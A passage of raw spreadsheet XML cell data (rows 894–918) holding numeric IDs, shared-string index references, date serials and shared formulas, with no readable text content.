        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S894" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="1">
        <v>10336.0</v>
      </c>
      <c r="B895" s="2" t="s">
        <v>3907</v>
      </c>
      <c r="C895" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D895" s="2" t="s">
        <v>3895</v>
      </c>
      <c r="E895" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F895" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G895" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H895" s="1" t="s">
        <v>3908</v>
      </c>
      <c r="I895" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J895" s="1" t="s">
        <v>3909</v>
      </c>
      <c r="K895" s="2" t="s">
        <v>3910</v>
      </c>
      <c r="L895" s="1">
        <v>1.0</v>
      </c>
      <c r="M895" s="1">
        <v>1.0</v>
      </c>
      <c r="N895" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O895" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P895" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q895" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R895" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S895" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="1">
        <v>10337.0</v>
      </c>
      <c r="B896" s="2" t="s">
        <v>3907</v>
      </c>
      <c r="C896" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D896" s="2" t="s">
        <v>3895</v>
      </c>
      <c r="E896" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F896" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G896" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H896" s="1" t="s">
        <v>3908</v>
      </c>
      <c r="I896" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J896" s="1" t="s">
        <v>3911</v>
      </c>
      <c r="K896" s="2" t="s">
        <v>3910</v>
      </c>
      <c r="L896" s="1">
        <v>1.0</v>
      </c>
      <c r="M896" s="1">
        <v>1.0</v>
      </c>
      <c r="N896" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O896" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P896" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q896" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R896" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S896" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="1">
        <v>10419.0</v>
      </c>
      <c r="B897" s="2" t="s">
        <v>3912</v>
      </c>
      <c r="C897" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D897" s="2" t="s">
        <v>3913</v>
      </c>
      <c r="E897" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F897" s="1" t="s">
        <v>153</v>
      </c>
      <c r="G897" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H897" s="4">
        <v>43620.779861111114</v>
      </c>
      <c r="I897" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="J897" s="1" t="s">
        <v>3914</v>
      </c>
      <c r="K897" s="2" t="s">
        <v>3915</v>
      </c>
      <c r="L897" s="1">
        <v>1.0</v>
      </c>
      <c r="M897" s="1">
        <v>1.0</v>
      </c>
      <c r="N897" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O897" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P897" s="1" t="s">
        <v>2088</v>
      </c>
      <c r="Q897" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R897" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S897" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="1">
        <v>10420.0</v>
      </c>
      <c r="B898" s="2" t="s">
        <v>3916</v>
      </c>
      <c r="C898" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D898" s="2" t="s">
        <v>3917</v>
      </c>
      <c r="E898" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F898" s="1" t="s">
        <v>1573</v>
      </c>
      <c r="G898" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H898" s="4">
        <v>44866.603472222225</v>
      </c>
      <c r="I898" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J898" s="1" t="s">
        <v>3918</v>
      </c>
      <c r="K898" s="2" t="s">
        <v>3919</v>
      </c>
      <c r="L898" s="1">
        <v>2.0</v>
      </c>
      <c r="M898" s="1">
        <v>7.0</v>
      </c>
      <c r="N898" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O898" s="1" t="s">
        <v>3920</v>
      </c>
      <c r="P898" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q898" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R898" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S898" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="1">
        <v>10427.0</v>
      </c>
      <c r="B899" s="2" t="s">
        <v>3921</v>
      </c>
      <c r="C899" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D899" s="2" t="s">
        <v>3922</v>
      </c>
      <c r="E899" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F899" s="1" t="s">
        <v>3923</v>
      </c>
      <c r="G899" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H899" s="4">
        <v>44869.532638888886</v>
      </c>
      <c r="I899" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J899" s="1" t="s">
        <v>3924</v>
      </c>
      <c r="K899" s="2" t="s">
        <v>3925</v>
      </c>
      <c r="L899" s="1">
        <v>1.0</v>
      </c>
      <c r="M899" s="1">
        <v>1.0</v>
      </c>
      <c r="N899" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O899" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P899" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q899" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R899" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S899" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="1">
        <v>10429.0</v>
      </c>
      <c r="B900" s="2" t="s">
        <v>3926</v>
      </c>
      <c r="C900" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D900" s="2" t="s">
        <v>3927</v>
      </c>
      <c r="E900" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F900" s="1" t="s">
        <v>3928</v>
      </c>
      <c r="G900" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H900" s="4">
        <v>43993.49097222222</v>
      </c>
      <c r="I900" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J900" s="1" t="s">
        <v>3929</v>
      </c>
      <c r="K900" s="2" t="s">
        <v>3930</v>
      </c>
      <c r="L900" s="1">
        <v>4.0</v>
      </c>
      <c r="M900" s="1">
        <v>6.0</v>
      </c>
      <c r="N900" s="1" t="s">
        <v>3931</v>
      </c>
      <c r="O900" s="1" t="s">
        <v>3932</v>
      </c>
      <c r="P900" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q900" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R900" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S900" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="1">
        <v>10430.0</v>
      </c>
      <c r="B901" s="2" t="s">
        <v>3933</v>
      </c>
      <c r="C901" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D901" s="2" t="s">
        <v>3934</v>
      </c>
      <c r="E901" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F901" s="1" t="s">
        <v>3935</v>
      </c>
      <c r="G901" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H901" s="4">
        <v>43993.54652777778</v>
      </c>
      <c r="I901" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J901" s="1" t="s">
        <v>3929</v>
      </c>
      <c r="K901" s="2" t="s">
        <v>3930</v>
      </c>
      <c r="L901" s="1">
        <v>4.0</v>
      </c>
      <c r="M901" s="1">
        <v>6.0</v>
      </c>
      <c r="N901" s="1" t="s">
        <v>3936</v>
      </c>
      <c r="O901" s="1" t="s">
        <v>3932</v>
      </c>
      <c r="P901" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q901" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R901" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S901" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="1">
        <v>10431.0</v>
      </c>
      <c r="B902" s="2" t="s">
        <v>3937</v>
      </c>
      <c r="C902" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D902" s="2" t="s">
        <v>3938</v>
      </c>
      <c r="E902" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F902" s="1" t="s">
        <v>73</v>
      </c>
      <c r="G902" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H902" s="4">
        <v>44023.67847222222</v>
      </c>
      <c r="I902" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J902" s="1" t="s">
        <v>3929</v>
      </c>
      <c r="K902" s="2" t="s">
        <v>3930</v>
      </c>
      <c r="L902" s="1">
        <v>4.0</v>
      </c>
      <c r="M902" s="1">
        <v>6.0</v>
      </c>
      <c r="N902" s="1" t="s">
        <v>3939</v>
      </c>
      <c r="O902" s="1" t="s">
        <v>3932</v>
      </c>
      <c r="P902" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q902" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R902" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S902" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="1">
        <v>10445.0</v>
      </c>
      <c r="B903" s="2" t="s">
        <v>3940</v>
      </c>
      <c r="C903" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D903" s="2" t="s">
        <v>3941</v>
      </c>
      <c r="E903" s="2" t="s">
        <v>320</v>
      </c>
      <c r="F903" s="1" t="s">
        <v>3942</v>
      </c>
      <c r="G903" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H903" s="4">
        <v>44657.404861111114</v>
      </c>
      <c r="I903" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J903" s="1" t="s">
        <v>3943</v>
      </c>
      <c r="K903" s="2" t="s">
        <v>3944</v>
      </c>
      <c r="L903" s="1">
        <v>3.0</v>
      </c>
      <c r="M903" s="1">
        <v>6.0</v>
      </c>
      <c r="N903" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O903" s="1" t="s">
        <v>3945</v>
      </c>
      <c r="P903" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q903" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R903" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S903" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="1">
        <v>10446.0</v>
      </c>
      <c r="B904" s="2" t="s">
        <v>3946</v>
      </c>
      <c r="C904" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D904" s="2" t="s">
        <v>3941</v>
      </c>
      <c r="E904" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F904" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G904" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H904" s="4">
        <v>44657.490277777775</v>
      </c>
      <c r="I904" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J904" s="1" t="s">
        <v>3943</v>
      </c>
      <c r="K904" s="2" t="s">
        <v>3944</v>
      </c>
      <c r="L904" s="1">
        <v>3.0</v>
      </c>
      <c r="M904" s="1">
        <v>6.0</v>
      </c>
      <c r="N904" s="1" t="s">
        <v>3947</v>
      </c>
      <c r="O904" s="1" t="s">
        <v>3945</v>
      </c>
      <c r="P904" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q904" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R904" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S904" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="1">
        <v>10450.0</v>
      </c>
      <c r="B905" s="2" t="s">
        <v>3948</v>
      </c>
      <c r="C905" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D905" s="2" t="s">
        <v>3941</v>
      </c>
      <c r="E905" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F905" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G905" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H905" s="4">
        <v>44687.51944444444</v>
      </c>
      <c r="I905" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J905" s="1" t="s">
        <v>3943</v>
      </c>
      <c r="K905" s="2" t="s">
        <v>3944</v>
      </c>
      <c r="L905" s="1">
        <v>3.0</v>
      </c>
      <c r="M905" s="1">
        <v>6.0</v>
      </c>
      <c r="N905" s="1" t="s">
        <v>3949</v>
      </c>
      <c r="O905" s="1" t="s">
        <v>3945</v>
      </c>
      <c r="P905" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q905" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R905" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S905" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="1">
        <v>10482.0</v>
      </c>
      <c r="B906" s="2" t="s">
        <v>3950</v>
      </c>
      <c r="C906" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D906" s="2" t="s">
        <v>3951</v>
      </c>
      <c r="E906" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F906" s="1" t="s">
        <v>3952</v>
      </c>
      <c r="G906" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H906" s="1" t="s">
        <v>3953</v>
      </c>
      <c r="I906" s="1" t="s">
        <v>3954</v>
      </c>
      <c r="J906" s="1" t="s">
        <v>3955</v>
      </c>
      <c r="K906" s="2" t="s">
        <v>3956</v>
      </c>
      <c r="L906" s="1">
        <v>3.0</v>
      </c>
      <c r="M906" s="1">
        <v>5.0</v>
      </c>
      <c r="N906" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O906" s="1" t="s">
        <v>3957</v>
      </c>
      <c r="P906" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q906" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R906" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S906" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="1">
        <v>10483.0</v>
      </c>
      <c r="B907" s="2" t="s">
        <v>3958</v>
      </c>
      <c r="C907" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D907" s="2" t="s">
        <v>3951</v>
      </c>
      <c r="E907" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F907" s="1" t="s">
        <v>3959</v>
      </c>
      <c r="G907" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H907" s="1" t="s">
        <v>3960</v>
      </c>
      <c r="I907" s="1" t="s">
        <v>3954</v>
      </c>
      <c r="J907" s="1" t="s">
        <v>3955</v>
      </c>
      <c r="K907" s="2" t="s">
        <v>3956</v>
      </c>
      <c r="L907" s="1">
        <v>3.0</v>
      </c>
      <c r="M907" s="1">
        <v>5.0</v>
      </c>
      <c r="N907" s="1" t="s">
        <v>2253</v>
      </c>
      <c r="O907" s="1" t="s">
        <v>3957</v>
      </c>
      <c r="P907" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q907" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R907" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S907" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="1">
        <v>10484.0</v>
      </c>
      <c r="B908" s="2" t="s">
        <v>3961</v>
      </c>
      <c r="C908" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D908" s="2" t="s">
        <v>3951</v>
      </c>
      <c r="E908" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F908" s="1" t="s">
        <v>3952</v>
      </c>
      <c r="G908" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H908" s="1" t="s">
        <v>3962</v>
      </c>
      <c r="I908" s="1" t="s">
        <v>3954</v>
      </c>
      <c r="J908" s="1" t="s">
        <v>3955</v>
      </c>
      <c r="K908" s="2" t="s">
        <v>3956</v>
      </c>
      <c r="L908" s="1">
        <v>3.0</v>
      </c>
      <c r="M908" s="1">
        <v>5.0</v>
      </c>
      <c r="N908" s="1" t="s">
        <v>3963</v>
      </c>
      <c r="O908" s="1" t="s">
        <v>3957</v>
      </c>
      <c r="P908" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q908" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R908" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S908" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="1">
        <v>10485.0</v>
      </c>
      <c r="B909" s="2" t="s">
        <v>3964</v>
      </c>
      <c r="C909" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D909" s="2" t="s">
        <v>3951</v>
      </c>
      <c r="E909" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F909" s="1" t="s">
        <v>3959</v>
      </c>
      <c r="G909" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H909" s="1" t="s">
        <v>3965</v>
      </c>
      <c r="I909" s="1" t="s">
        <v>3954</v>
      </c>
      <c r="J909" s="1" t="s">
        <v>3955</v>
      </c>
      <c r="K909" s="2" t="s">
        <v>3956</v>
      </c>
      <c r="L909" s="1">
        <v>3.0</v>
      </c>
      <c r="M909" s="1">
        <v>5.0</v>
      </c>
      <c r="N909" s="1" t="s">
        <v>3966</v>
      </c>
      <c r="O909" s="1" t="s">
        <v>3957</v>
      </c>
      <c r="P909" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q909" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R909" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S909" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="1">
        <v>10497.0</v>
      </c>
      <c r="B910" s="2" t="s">
        <v>3967</v>
      </c>
      <c r="C910" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D910" s="2" t="s">
        <v>3968</v>
      </c>
      <c r="E910" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F910" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G910" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H910" s="1" t="s">
        <v>3969</v>
      </c>
      <c r="I910" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J910" s="1" t="s">
        <v>3970</v>
      </c>
      <c r="K910" s="2" t="s">
        <v>3971</v>
      </c>
      <c r="L910" s="1">
        <v>1.0</v>
      </c>
      <c r="M910" s="1">
        <v>1.0</v>
      </c>
      <c r="N910" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O910" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P910" s="1" t="s">
        <v>3972</v>
      </c>
      <c r="Q910" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R910" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S910" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="1">
        <v>10499.0</v>
      </c>
      <c r="B911" s="2" t="s">
        <v>3973</v>
      </c>
      <c r="C911" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D911" s="2" t="s">
        <v>3974</v>
      </c>
      <c r="E911" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F911" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G911" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H911" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="I911" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J911" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="K911" s="2" t="s">
        <v>3977</v>
      </c>
      <c r="L911" s="1">
        <v>1.0</v>
      </c>
      <c r="M911" s="1">
        <v>1.0</v>
      </c>
      <c r="N911" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O911" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P911" s="1" t="s">
        <v>2743</v>
      </c>
      <c r="Q911" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R911" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S911" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="1">
        <v>10501.0</v>
      </c>
      <c r="B912" s="2" t="s">
        <v>3978</v>
      </c>
      <c r="C912" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D912" s="2" t="s">
        <v>3979</v>
      </c>
      <c r="E912" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F912" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G912" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H912" s="1" t="s">
        <v>3980</v>
      </c>
      <c r="I912" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J912" s="1" t="s">
        <v>3981</v>
      </c>
      <c r="K912" s="2" t="s">
        <v>3982</v>
      </c>
      <c r="L912" s="1">
        <v>1.0</v>
      </c>
      <c r="M912" s="1">
        <v>1.0</v>
      </c>
      <c r="N912" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O912" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P912" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q912" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R912" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S912" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="1">
        <v>10513.0</v>
      </c>
      <c r="B913" s="2" t="s">
        <v>3983</v>
      </c>
      <c r="C913" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D913" s="2" t="s">
        <v>3984</v>
      </c>
      <c r="E913" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F913" s="1" t="s">
        <v>3985</v>
      </c>
      <c r="G913" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H913" s="4">
        <v>44843.18472222222</v>
      </c>
      <c r="I913" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J913" s="1" t="s">
        <v>3986</v>
      </c>
      <c r="K913" s="2" t="s">
        <v>3987</v>
      </c>
      <c r="L913" s="1">
        <v>4.0</v>
      </c>
      <c r="M913" s="1">
        <v>6.0</v>
      </c>
      <c r="N913" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O913" s="1" t="s">
        <v>3988</v>
      </c>
      <c r="P913" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q913" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R913" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S913" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="1">
        <v>10514.0</v>
      </c>
      <c r="B914" s="2" t="s">
        <v>3989</v>
      </c>
      <c r="C914" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D914" s="2" t="s">
        <v>3990</v>
      </c>
      <c r="E914" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F914" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G914" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H914" s="4">
        <v>44843.21111111111</v>
      </c>
      <c r="I914" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J914" s="1" t="s">
        <v>3986</v>
      </c>
      <c r="K914" s="2" t="s">
        <v>3987</v>
      </c>
      <c r="L914" s="1">
        <v>4.0</v>
      </c>
      <c r="M914" s="1">
        <v>6.0</v>
      </c>
      <c r="N914" s="1" t="s">
        <v>3632</v>
      </c>
      <c r="O914" s="1" t="s">
        <v>3988</v>
      </c>
      <c r="P914" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q914" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R914" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S914" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="1">
        <v>10515.0</v>
      </c>
      <c r="B915" s="2" t="s">
        <v>3991</v>
      </c>
      <c r="C915" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D915" s="2" t="s">
        <v>3992</v>
      </c>
      <c r="E915" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F915" s="1" t="s">
        <v>3985</v>
      </c>
      <c r="G915" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H915" s="4">
        <v>44843.22708333333</v>
      </c>
      <c r="I915" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J915" s="1" t="s">
        <v>3986</v>
      </c>
      <c r="K915" s="2" t="s">
        <v>3987</v>
      </c>
      <c r="L915" s="1">
        <v>4.0</v>
      </c>
      <c r="M915" s="1">
        <v>6.0</v>
      </c>
      <c r="N915" s="1" t="s">
        <v>487</v>
      </c>
      <c r="O915" s="1" t="s">
        <v>3988</v>
      </c>
      <c r="P915" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q915" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R915" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S915" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="1">
        <v>10559.0</v>
      </c>
      <c r="B916" s="2" t="s">
        <v>3993</v>
      </c>
      <c r="C916" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D916" s="2" t="s">
        <v>3994</v>
      </c>
      <c r="E916" s="2" t="s">
        <v>1495</v>
      </c>
      <c r="F916" s="1" t="s">
        <v>747</v>
      </c>
      <c r="G916" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H916" s="1" t="s">
        <v>3995</v>
      </c>
      <c r="I916" s="1" t="s">
        <v>748</v>
      </c>
      <c r="J916" s="1" t="s">
        <v>3996</v>
      </c>
      <c r="K916" s="2" t="s">
        <v>3997</v>
      </c>
      <c r="L916" s="1">
        <v>1.0</v>
      </c>
      <c r="M916" s="1">
        <v>1.0</v>
      </c>
      <c r="N916" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O916" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P916" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q916" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R916" s="2">
        <f t="shared" si="2"/>
        <v>9</v>
      </c>
      <c r="S916" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="1">
        <v>10560.0</v>
      </c>
      <c r="B917" s="2" t="s">
        <v>3998</v>
      </c>
      <c r="C917" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D917" s="2" t="s">
        <v>3994</v>
      </c>
      <c r="E917" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F917" s="1" t="s">
        <v>747</v>
      </c>
      <c r="G917" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H917" s="1" t="s">
        <v>3999</v>
      </c>
      <c r="I917" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J917" s="1" t="s">
        <v>4000</v>
      </c>
      <c r="K917" s="2" t="s">
        <v>3997</v>
      </c>
      <c r="L917" s="1">
        <v>1.0</v>
      </c>
      <c r="M917" s="1">
        <v>1.0</v>
      </c>
      <c r="N917" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O917" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P917" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q917" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R917" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S917" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="1">
        <v>10580.0</v>
      </c>
      <c r="B918" s="2" t="s">
        <v>4001</v>
      </c>
      <c r="C918" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D918" s="2" t="s">
        <v>4002</v>
      </c>
      <c r="E918" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F918" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G918" s="1" t="b">
        <v>1</v>
      </c>
